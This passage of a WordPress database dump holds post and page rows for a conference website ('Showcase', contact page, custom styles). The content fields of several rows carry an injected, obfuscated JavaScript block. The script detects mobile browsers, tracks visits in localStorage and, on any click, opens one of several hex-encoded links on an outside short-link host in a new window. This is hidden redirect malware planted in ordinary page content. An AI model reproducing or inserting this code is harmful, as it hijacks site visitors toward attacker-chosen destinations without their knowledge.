|o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Custom Styles','','publish','closed','closed','','wp-global-styles-dt-the7','','','2022-10-03 23:06:31','2022-10-03 23:06:31','',0,'https://gsw2023.com/index.php/2022/10/03/wp-global-styles-dt-the7/',0,'wp_global_styles','',0),
(29,1,'2022-10-03 23:19:10','2022-10-03 23:19:10','','1','','inherit','open','closed','','1','','','2022-10-03 23:19:10','2022-10-03 23:19:10','',0,'https://gsw2023.com/wp-content/uploads/2022/10/1.jpg',0,'attachment','image/jpeg',0),
(51,1,'2016-02-07 10:05:10','2016-02-07 10:05:10','<p>[vc_row][vc_column][dt_portfolio_masonry mode=\"grid\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" loading_mode=\"js_more\" jsm_posts_per_page=\"6\" show_categories_filter=\"y\" category=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Showcase','','publish','closed','closed','','showcase','','','2016-02-07 10:05:10','2016-02-07 10:05:10','',0,'https://the7.io/marketing-agency/?page_id=51',40,'page','',0),
(53,1,'2016-02-07 10:05:39','2016-02-07 10:05:39','<p>[vc_row equal_height=\"yes\" content_placement=\"top\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529513148816{padding-top: 70px !important;padding-bottom: 30px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Get In Touch!\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][vc_column][vc_row_inner equal_height=\"yes\" content_placement=\"top\"][vc_column_inner width=\"1/2\" css=\".vc_custom_1491746397816{padding-bottom: 50px !important;}\"][dt_fancy_image image_id=\"2364\" onclick=\"custom_link\" image_link=\"https://www.google.com/maps/@30.043056,31.232,16z?hl=en\" custom_link_target=\"_blank\" width=\"600\" css=\".vc_custom_1665134722899{padding-bottom: 30px !important;}\"][vc_column_text css=\".vc_custom_1665135195655{padding-bottom: 20px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong>Arab Academy for Science, Technology and Maritime Transport</strong><br />\nWe\'d love to hear from you and this is how you can reach us...[/vc_column_text][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"color: #333333;\"><strong>MAIL</strong></span><br />\ninfo@gsw2023.com[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\" css=\".vc_custom_1491746388981{padding-bottom: 50px !important;}\"][dt_contact_form fields=\"name,email,telephone,country,message\" message_height=\"9\" required=\"name,email,telephone,country,message\" terms=\"y\" terms_msg=\"QnklMjB1c2luZyUyMHRoaXMlMjBmb3JtJTIweW91JTIwYWdyZWUlMjB3aXRoJTIwdGhlJTIwc3RvcmFnZSUyMGFuZCUyMGhhbmRsaW5nJTIwb2YlMjB5b3VyJTIwZGF0YSUyMGJ5JTIwdGhpcyUyMHdlYnNpdGUu\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 